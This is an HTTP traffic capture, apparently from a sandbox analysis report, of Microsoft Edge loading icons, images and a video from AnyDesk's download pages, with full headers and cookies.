18.66.248.51:443

Request

GET /_static/icons/red/bold/desktop-monitor-settings-aa56ff.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: hxPeLy6wm24Jkfe-wOhLWU5S_jWCCi9DC7i6q2GBtaN5Lr4TlEPlVg==
age: 61628
GET

https://anydesk.com/_static/icons/white/light/controls-play-558754.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/light/controls-play-558754.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: InO6W_m2DBG5imT9FM5VNH6jUX5dj_ykckdnsIxE7HSk2VA2b6hTkA==
age: 61628
GET

https://anydesk.com/_static/icons/red/bold/space-rocket-flying-99394c.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/space-rocket-flying-99394c.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 7EJHL6RYZcoK5vQkRqVaUfwSOwC5TkJWGKTkcFpIwk2TEnRJkUgv9A==
age: 61628
GET

https://anydesk.com/_static/icons/red/bold/desktop-monitor-settings-aa56ff.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/desktop-monitor-settings-aa56ff.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Zm_GWcyCCIOPxKuJPzqMGcZ5pU2w2IzJ5fbUeVrBd8BGtG7J3nAN-w==
age: 61628
GET

https://anydesk.com/_static/icons/red/bold/responsive-design-1-6085ec.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/responsive-design-1-6085ec.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: sxaFp64ZcPt5NqzoxP4OzLXX4NoDqiSNbX6EbX1DBpqyySEaMeMTMQ==
age: 61628
GET

https://anydesk.com/_static/img/videos/anydesk-employee-woman-sitting-office-red-65bcea.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/videos/anydesk-employee-woman-sitting-office-red-65bcea.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: HUi4_fwbjRZ5nyCpupodhmwReWlofwBaLmEt2YQ_87DwvE9duI2IZA==
age: 61628
GET

https://anydesk.com/_static/icons/white/light/controls-play-558754.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/light/controls-play-558754.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: slcG0GgGUSltyYlGEpG6pTU6KkkODYbg4_7xDV3wWzs_NZAt1AUgJQ==
age: 61628
GET

https://anydesk.com/_static/icons/red/light/controls-play-c7b57a.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/light/controls-play-c7b57a.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 206

content-type: video/mp4
content-length: 20112802
server: nginx
date: Fri, 04 Oct 2024 23:00:31 GMT
last-modified: Wed, 20 Oct 2021 12:50:07 GMT
etag: "6170107f-132e5a2"
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-range: bytes 0-20112801/20112802
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 8e6HjXEnaq0ao8iUaEHbo4sUNCv9tCour-3bPlcX4Y6slPKH0q4JsA==
age: 61655
GET

https://www.anydesk.com/_videos/in_a_nutshell.mp4

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_videos/in_a_nutshell.mp4 HTTP/2.0
host: www.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://anydesk.com/
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
range: bytes=0-

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ouZUsXmfTdk_4eu0qmb0_DU9zlL0qRxfKjBFcty3KTZEHw8GjmPaDA==
age: 61647
GET

https://anydesk.com/_static/icons/white/bold/phone-9be7e0.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/bold/phone-9be7e0.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 3VZSncl6G-slKcy7PZBbFiDY04e3mJKJKtZlntpdak8HF6YhQa2hcQ==
age: 61647
GET

https://anydesk.com/_static/icons/red/bold/arrow-button-right-1-acd1f2.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/arrow-button-right-1-acd1f2.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: tES7Bh3c2YBsQ0lRQD1xHsDUOoLUr5euHGaq3Ou31JsLypLXarTb5A==
age: 61647
GET

https://anydesk.com/_static/icons/white/bold/arrow-button-right-1-d8f1ad.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/bold/arrow-button-right-1-d8f1ad.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: tMRU4pXpitaJvT_cAc67_TECV0JAg6Bn9qQ6lEjrjWSVAdHXIpEKLg==
age: 61647
GET

https://anydesk.com/_static/img/logos/made-in-europe-white-69e1fc.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/logos/made-in-europe-white-69e1fc.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: p5ZtRHEsMAl3RibXB9cRTF7aRVLlgzWzKd8hwh2nruT72dSGsPkEPA==
age: 61653
GET

https://anydesk.com/_static/img/badges/google-play-badge-1338ed.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/google-play-badge-1338ed.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: sKmQLOX16BW4HCv0LhwUGbL5KwIo5jxa78Ztq9C5fIfjnr7dOMn5lA==
age: 61653
GET

https://anydesk.com/_static/img/badges/app-store-badge-2f2fe1.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/app-store-badge-2f2fe1.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: SQFNcyfoj1t8nOYnPQSKyhHVVaeqvflT9oLwbuGse8evtss47LpA_w==
age: 61652
GET

https://anydesk.com/_static/icons/white/bold/keyboard-arrow-top-right-5f4184.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/bold/keyboard-arrow-top-right-5f4184.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: L3PPPNtIpgnY7RKsXbHwvs1AGWE7r2vYhVDnn2O8dYKNSmuL3XB_7w==
age: 61653
GET

https://anydesk.com/_static/img/hero/fadeout-stuttgart-opera-mobile-newsletter.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/hero/fadeout-stuttgart-opera-mobile-newsletter.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: M8ebZpF3UaOFiI7xaGinafOBGQDtxEoQ_IcHpBsnJqBL1Q5R_5wi-g==
age: 61653
GET

https://anydesk.com/_static/img/icons/tiktok-logo-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/tiktok-logo-white.svg HTTP/2.0
host: anydesk.com
